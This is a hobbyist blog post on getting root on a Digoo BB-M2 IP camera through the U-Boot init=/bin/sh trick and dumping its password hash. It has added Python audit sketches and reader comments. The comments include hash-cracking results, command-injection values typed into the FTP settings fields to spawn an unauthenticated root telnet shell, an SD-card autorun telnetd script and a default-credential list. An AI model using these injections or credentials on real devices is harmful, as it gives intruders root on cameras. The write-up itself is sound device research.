Hacking IP-Camera Digoo BB-M2 – Part 3 – Getting root access


After getting access to the serial interface of the IP-Camera the next step is to get a root shell.


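By pressing any key during the start-up of the IP-Camera it is possible to stop the automatic boot and get to the U-Boot prompt.
Here the bootargs can be extended with “init=/bin/sh” so that the kernel starts a shell instead of the regular init; the kernel uses the last “init=” it finds, so the appended value overrides the earlier “init=/linuxrc”.
After adjusting the boot arguments, the Linux operating system is started with “boot”.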

isvp# setenv bootargs 'console=ttyS1,115200n8 mem=39M@0x0 ispmem=5M@0x2700000 rmem=20M@0x2C00000 init/linuxrc rootfstype=squashfs init=/linuxrc rootfstype=squashfs root=/dev/mtdblock2 rw mtdparts=jz_sfc:256k(boot),2176k(kernel),3584k(rootfs),2176k(system) init=/bin/sh'
isvp# boot

After a successful boot, a root shell prompt appears.

/ # whoami
root
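
The following Python sketch is an added example, not code from the original post: it parses the bootargs string from the setenv line above, shows which init= the kernel ends up using, and derives the flash layout from mtdparts, as a check a start-up script could run against /proc/cmdline. The function names are hypothetical, and it assumes that mtdblock numbers follow the mtdparts order.

```python
"""Added example: audit a kernel command line for an init= override."""
import re

# The bootargs string exactly as it appears in the setenv command above.
BOOTARGS = (
    "console=ttyS1,115200n8 mem=39M@0x0 ispmem=5M@0x2700000 "
    "rmem=20M@0x2C00000 init/linuxrc rootfstype=squashfs "
    "init=/linuxrc rootfstype=squashfs root=/dev/mtdblock2 rw "
    "mtdparts=jz_sfc:256k(boot),2176k(kernel),3584k(rootfs),2176k(system) "
    "init=/bin/sh"
)

UNITS = {"": 1, "k": 1024, "m": 1024 ** 2, "g": 1024 ** 3}
PART_RE = re.compile(r"(\d+)([kmg]?)\(([^)]+)\)", re.IGNORECASE)


def parse_cmdline(cmdline):
    """Map each key to the list of its values, in order of appearance.

    Simplification: splits on whitespace only, so quoted values containing
    spaces are not supported. Tokens without '=' get the value None.
    """
    params = {}
    for token in cmdline.split():
        key, sep, value = token.partition("=")
        params.setdefault(key, []).append(value if sep else None)
    return params


def effective_init(params):
    """Every init= overwrites the previous one, so the last value wins."""
    values = params.get("init", [])
    return values[-1] if values else None


def parse_mtdparts(spec):
    """Parse 'device:size(name),...' into (name, offset, size) in bytes.

    Handles only the plain size(name) form used on this page, not '-',
    '@offset' or the 'ro' suffix.
    """
    device, _, parts = spec.partition(":")
    layout, offset = [], 0
    for part in parts.split(","):
        match = PART_RE.fullmatch(part)
        if match is None:
            raise ValueError(f"unsupported mtdparts entry: {part!r}")
        size = int(match.group(1)) * UNITS[match.group(2).lower()]
        layout.append((match.group(3), offset, size))
        offset += size
    return device, layout


def root_partition(params):
    """Name of the mtdparts entry that root=/dev/mtdblockN points at.

    Assumption: mtdblock numbers follow the order of the mtdparts entries.
    """
    root = (params.get("root") or [None])[-1]
    match = re.fullmatch(r"/dev/mtdblock(\d+)", root or "")
    if match is None or "mtdparts" not in params:
        return None
    _, layout = parse_mtdparts(params["mtdparts"][-1])
    index = int(match.group(1))
    return layout[index][0] if index < len(layout) else None


def audit(cmdline, expected_init="/linuxrc"):
    """Return findings for a command line such as the text of /proc/cmdline."""
    params = parse_cmdline(cmdline)
    findings = []
    init = effective_init(params)
    if init != expected_init:
        findings.append(f"init is {init}, expected {expected_init}")
    if len(params.get("init", [])) > 1:
        findings.append("init= appears more than once")
    return findings


if __name__ == "__main__":
    parsed = parse_cmdline(BOOTARGS)
    for name, offset, size in parse_mtdparts(parsed["mtdparts"][-1])[1]:
        print(f"{name:8} offset=0x{offset:06x} size=0x{size:06x}")
    print("root partition:", root_partition(parsed))
    for finding in audit(BOOTARGS):
        print("FINDING:", finding)
```

The four partitions add up to exactly 8 MiB, and root=/dev/mtdblock2 resolves to the “rootfs” entry.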

With the root shell it is possible to print out the “/etc/passwd” file with the hashed root password.

/ # cat /etc/passwd 
root:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh

Structure of the /etc/passwd file

  • root:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh
  • Name:Password:User-ID:Group-ID:Comment:Directory:Shell

Theoretically it would be possible to compare rainbow tables with the hashed password from “/etc/passwd”.
But so far this has not worked.

Furthermore, the available busybox commands can be listed.
Now the IP-Camera operating system can be analyzed.

    / # busybox 
    BusyBox v1.22.1 (2014-05-13 08:27:59 CST) multi-call binary.
    BusyBox is copyrighted by many authors between 1998-2012.
    Licensed under GPLv2. See source distribution for detailed
    copyright notices.
    
    Usage: busybox [function [arguments]...]
       or: busybox --list[-full]
       or: busybox --install [-s] [DIR]
       or: function [arguments]...
    
            BusyBox is a multi-call binary that combines many common Unix
            utilities into a single executable.  Most people will create a
            link to busybox for each function they wish to use and BusyBox
            will act like whatever it was invoked as.
    
    Currently defined functions:
            [, [[, acpid, add-shell, addgroup, adduser, adjtimex, arp, arping, ash,
            awk, base64, basename, beep, blkid, blockdev, bootchartd, brctl,
            bunzip2, bzcat, bzip2, cal, cat, catv, chat, chattr, chgrp, chmod,
            chown, chpasswd, chpst, chroot, chrt, chvt, cksum, clear, cmp, comm,
            conspy, cp, cpio, crond, crontab, cryptpw, cttyhack, cut, date, dc, dd,
            deallocvt, delgroup, deluser, depmod, devmem, df, dhcprelay, diff,
            dirname, dmesg, dnsd, dnsdomainname, dos2unix, du, dumpkmap,
            dumpleases, echo, ed, egrep, eject, env, envdir, envuidgid, ether-wake,
            expand, expr, fakeidentd, false, fbset, fbsplash, fdflush, fdformat,
            fdisk, fgconsole, fgrep, find, findfs, flock, fold, free, freeramdisk,
            fsck, fsck.minix, fstrim, fsync, ftpd, ftpget, ftpput, fuser, getopt,
            getty, grep, groups, gunzip, gzip, halt, hd, hdparm, head, hexdump,
            hostid, hostname, httpd, hush, hwclock, id, ifconfig, ifdown,
            ifenslave, ifplugd, ifup, inetd, init, insmod, install, ionice, iostat,
            ip, ipaddr, ipcalc, ipcrm, ipcs, iplink, iproute, iprule, iptunnel,
            kbd_mode, kill, killall, killall5, klogd, last, less, linux32, linux64,
            linuxrc, ln, loadfont, loadkmap, logger, login, logname, logread,
            losetup, lpd, lpq, lpr, ls, lsattr, lsmod, lsof, lspci, lsusb, lzcat,
            lzma, lzop, lzopcat, makedevs, makemime, man, md5sum, mdev, mesg,
            microcom, mkdir, mkdosfs, mke2fs, mkfifo, mkfs.ext2, mkfs.minix,
            mkfs.vfat, mknod, mkpasswd, mkswap, mktemp, modinfo, modprobe, more,
            mount, mountpoint, mpstat, mt, mv, nameif, nanddump, nandwrite,
            nbd-client, nc, netstat, nice, nmeter, nohup, nslookup, ntpd, od,
            openvt, passwd, patch, pgrep, pidof, ping, ping6, pipe_progress,
            pivot_root, pkill, pmap, popmaildir, poweroff, powertop, printenv,
            printf, ps, pscan, pstree, pwd, pwdx, raidautorun, rdate, rdev,
            readahead, readlink, readprofile, realpath, reboot, reformime,
            remove-shell, renice, reset, resize, rev, rm, rmdir, rmmod, route, rpm,
            rpm2cpio, rtcwake, run-parts, runlevel, runsv, runsvdir, rx, script,
            scriptreplay, sed, sendmail, seq, setarch, setconsole, setfont,
            setkeycodes, setlogcons, setserial, setsid, setuidgid, sh, sha1sum,
            sha256sum, sha3sum, sha512sum, showkey, slattach, sleep, smemcap,
            softlimit, sort, split, start-stop-daemon, stat, strings, stty, su,
            sulogin, sum, sv, svlogd, swapoff, swapon, switch_root, sync, sysctl,
            syslogd, tac, tail, tar, tcpsvd, tee, telnet, telnetd, test, tftp,
            tftpd, time, timeout, top, touch, tr, traceroute, traceroute6, true,
            tty, ttysize, tunctl, ubiattach, ubidetach, ubimkvol, ubirmvol,
            ubirsvol, ubiupdatevol, udhcpc, udhcpd, udpsvd, umount, uname,
            unexpand, uniq, unix2dos, unlzma, unlzop, unxz, unzip, uptime, users,
            usleep, uudecode, uuencode, vconfig, vi, vlock, volname, wall, watch,
            watchdog, wc, wget, which, who, whoami, whois, xargs, xz, xzcat, yes,
            zcat, zcip
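
As an added example (not part of the original post), the following Python sketch applies the /etc/passwd field structure described above to the entries quoted on this page and reports which hash scheme each password field uses, the kind of check one would run over an extracted firmware root filesystem. The function names and finding texts are hypothetical; only the `$1$`, `$5$` and `$6$` ids and the traditional 13-character DES format are recognised.

```python
"""Added example: classify the password field of passwd/shadow entries."""
import re

# Entries quoted on this page: the article's /etc/passwd line, the line
# from comment 16 and the shadow-format lines from comment 22.
SAMPLE = """\
root:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh
root:Sm.hequiv6Pwk:0:0::/root:/bin/sh
root:$5$EvgtGUo1zRnZRW$Ge399ZNp3EYQP1NJt7MF1fbYjfnhtloG5m1N2KCp9l0:10933:0:99999:7:::
bin:*:10933:0:99999:7:::
"""

# crypt(3) ids that share the layout $id$[rounds=N$]salt$hash
MCF_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt"}
LEGACY = {"descrypt", "md5crypt"}       # schemes considered outdated
NO_HASH = {"empty", "shadowed", "locked"}
# Traditional DES crypt: 2 salt characters followed by 11 hash characters.
DES_RE = re.compile(r"[./0-9A-Za-z]{13}")


def classify_hash(field):
    """Return (scheme, salt) for the second field of a passwd/shadow line."""
    if field == "":
        return "empty", None            # account has no password at all
    if field == "x":
        return "shadowed", None         # the hash is kept in /etc/shadow
    if field[0] in "*!":
        return "locked", None           # password login disabled
    if field.startswith("$"):
        parts = field.split("$")        # ['', id, (rounds=N,) salt, hash]
        scheme = MCF_IDS.get(parts[1])
        if scheme is None:
            return "other", None
        rest = [p for p in parts[2:] if not p.startswith("rounds=")]
        return scheme, rest[0] if len(rest) == 2 else None
    if DES_RE.fullmatch(field):
        return "descrypt", field[:2]
    return "other", None


def audit_line(line):
    """Parse one entry (7 fields = passwd, 9 fields = shadow) and flag it."""
    fields = line.rstrip("\n").split(":")
    if len(fields) == 7:
        source = "passwd"
    elif len(fields) == 9:
        source = "shadow"
    else:
        raise ValueError(f"expected 7 or 9 fields, got {len(fields)}")
    scheme, salt = classify_hash(fields[1])
    findings = []
    if source == "passwd" and scheme not in NO_HASH:
        findings.append("password hash stored in world-readable passwd file")
    if scheme in LEGACY:
        findings.append(f"legacy hash scheme: {scheme}")
    if scheme == "empty":
        findings.append("empty password")
    return {"user": fields[0], "source": source, "scheme": scheme,
            "salt": salt, "findings": findings}


def audit(text):
    """Audit every non-empty line of a passwd or shadow file."""
    return [audit_line(line) for line in text.splitlines() if line.strip()]


if __name__ == "__main__":
    for row in audit(SAMPLE):
        print(row["user"], row["source"], row["scheme"], row["salt"])
        for finding in row["findings"]:
            print("  FINDING:", finding)
```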
    

    31 Comments on “Hacking IP-Camera Digoo BB-M2 – Part 3 – Getting root access”

    1. I’ve tried passwords of length 0 to 5. My computer is not fast enough to try further as it says it will take ~42 days just to try passwords of length 6. Are you getting anywhere with it?

    2. I have been running “John the Ripper” on a dual core for about a week. No results at the moment. The system has limited power and reaches 5886p/s 5886c/s 5886C/s with 4 forks. I think the chance to get a hit is pretty low, but I will post the results if it succeeds.

    3. Quick tests and standard logins did not succeed.
      At the moment I am testing with john the ripper incremental mode up to 8 characters.. still about 3 weeks left to complete and no results at this time..

    4. I’m afraid without powerful friends/luck this hash won’t be cracked.
      7/8 lowercase no results either, 9 lower would take a month with my aging GPU already.. mixed is right out.

    5. I’ve tried a wordlist from crackstation.net with John, also without luck.

    6. Well, that’s interesting! Will check this tomorrow. Thank you for pointing to the article!

    7. With telnet access, /system/init/ipcam.sh can be modified for startup scripts, e.g. add “sleep 30 && sh /mnt/startup.sh &” to call a script named startup.sh which resides on the sd card. Helps avoiding boot loops, removing the sd card fixes any fckup. Another goodie, ftp server can be started via “tcpsvd -vE 0.0.0.0 21 ftpd / &”

    8. Trick with ftp script injection works well for temporary root access.
      Have the same camera, still trying to bruteforce it, but it seems to be simpler to dump the firmware and repack it.

    9. If serial root access is possible then there must be a way to change the root password either via passwd or by creating a known one off-line and editing the /etc/passwd file. Unless of course /etc/passwd is not writable. That I do not know. Has anyone looked at the BB-M1?

    10. Guys, why would you like to do things in the most complicated way? To get root access, follow these steps:

      1) go to website console of your camera with your username and password
      2) go to Alarm Service Settings / Ftp Service Settings
      3) as FTP server put: $(killall telnetd)
      4) as username put: $(telnetd -l /bin/sh)
      5) click Set up button, then click on Test button, in new window you should get error message (that’s ok)
      6) since now you have got root access via telnet, so just run telnet (port 23) to IP of your camera (LAN IP) and… that’s it

      Screenshot here – https://ctrlv.cz/99bU

    11. Hi my friend,

      I have this camera, and from one moment to the next it stopped working. So I tried to connect to the serial port, with success, and saw that the camera boots automatically.

      I stopped the boot process and tried to erase all memory and send a new firmware… my bad… now the camera doesn’t boot, I think the bootloader is missing…

      Could you help me? Any idea how to send the bootloader/firmware using the SD card, the serial port or any other way?

      Thanks and regards

    12. I have a Digoo M1Q IP camera, which is like yoosee and others; after an upgrade via wifi it does not work anymore. It seems the boot loader/firmware is broken; it is not recognized on USB.
      Do you have any tips or ideas on how to put the firmware on it again?
      Thank you !

    13. $1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0 = md5(“ybdHbPDn” + “hslwificam”)

    14. Hi, nice work. I would like to ask, if possible, for a firmware dump of a working BB-M2, as mine seems to be corrupted and I want to write it back… any help would be appreciated. Thanks!

    15. hhrhhr: you are a true hero, thanks!

      and if anybody knows the root password of the BB-M1, please tell us that also.

    16. I have a cam with nearly the same hardware:

      / # cat /etc/passwd
      root:Sm.hequiv6Pwk:0:0::/root:/bin/sh

      it is one of these china cams for 20 euros 😉

    17. This looks very close to the V380E, down to the light sensor at the front. Anyone gotten into the serial line or telnet there?

    18. Update: I have now dumped the flash (8MB!) from the V380E camera. 🙂 I’ll try to extract the filesystem from there, and then walk around in it, perhaps run crack on passwd. Progress!

      How-to: Asserting HOLD# on the flash chip caused the bootloader to crash, so the flash-reader had the SPI bus all to itself after that. Powered via the USB connector, not the flash programmer. (Of course making sure the programmer’s 3v3 wasn’t connected to the chip.)

    19. More update: I just added a ‘toor’ user with my camera’s number as password, and uid 0, and put that squashfs (xz-compressed) back in the original firmware, and flashed it back to the camera. Now I have a shell prompt! Same as when reading the flash – first crash the bootloader with HOLD#, then use the programmer to put your new image into the flash memory. Tadah!

    20. Hello. Thanks for the good job. Can you help me discover the root password of my bricked IP camera? I tried to modify platform.sh, which I think is broken, but without success.

      More info here: http://forum.videon.spb.ru/viewtopic.php?f=24&t=12493

      This is my serial log:


      I tried with this, but not working: :%)

      admin:admin
      root:root
      root:null
      admin:null
      root:cxlinux
      admin:cxlinux
      default:null
      admin:123456
      root:123456
      admin:xmhdipc
      root:xmhdipc

      Code:
      $ mount SD card
      mount: you must be root

      $ mv mnt mnt1
      mv: can't rename 'mnt': Permission denied

      $init isp
      init: must be run as PID 1

      $ reboot
      reboot: Operation not permitted

    21. I have a similar camera based off the same hardware but does not have telnet running by default or many of the other services. But I did find that it monitors the SDcard for a file called “360_autorun.sh”

      If you create a file on the root of the SD called “360_autorun.sh” you can get it to run telnet or any other command, saves connecting a serial cable 😉
      #!/bin/sh
      telnetd -l /bin/sh

    22. 360_autorun.sh doesn’t work.

      The user on new firmwares is only root (for telnet and OS)
      The password is a sha256 with this hash:

      root:$5$EvgtGUo1zRnZRW$Ge399ZNp3EYQP1NJt7MF1fbYjfnhtloG5m1N2KCp9l0:10933:0:99999:7:::
      bin:*:10933:0:99999:7:::
      daemon:*:10933:0:99999:7:::
      nobody:*:10933:0:99999:7:::

      If someone knows the password we will be very grateful.

      Regards

    23. Can someone help on how I restore firmware dumps? (bin files?)

      Thanks!

    24. Please, any help.. How can I write the flash dumps (boot.bin, kernel.bin, rootfs.bin & system.bin) back to the camera? Thanks in advance

    25. Hello there! I know this is kinda off topic but I was wondering if you knew where I could
      locate a captcha plugin for my comment form? I’m using the
      same blog platform as yours and I’m having trouble
      finding one? Thanks a lot!
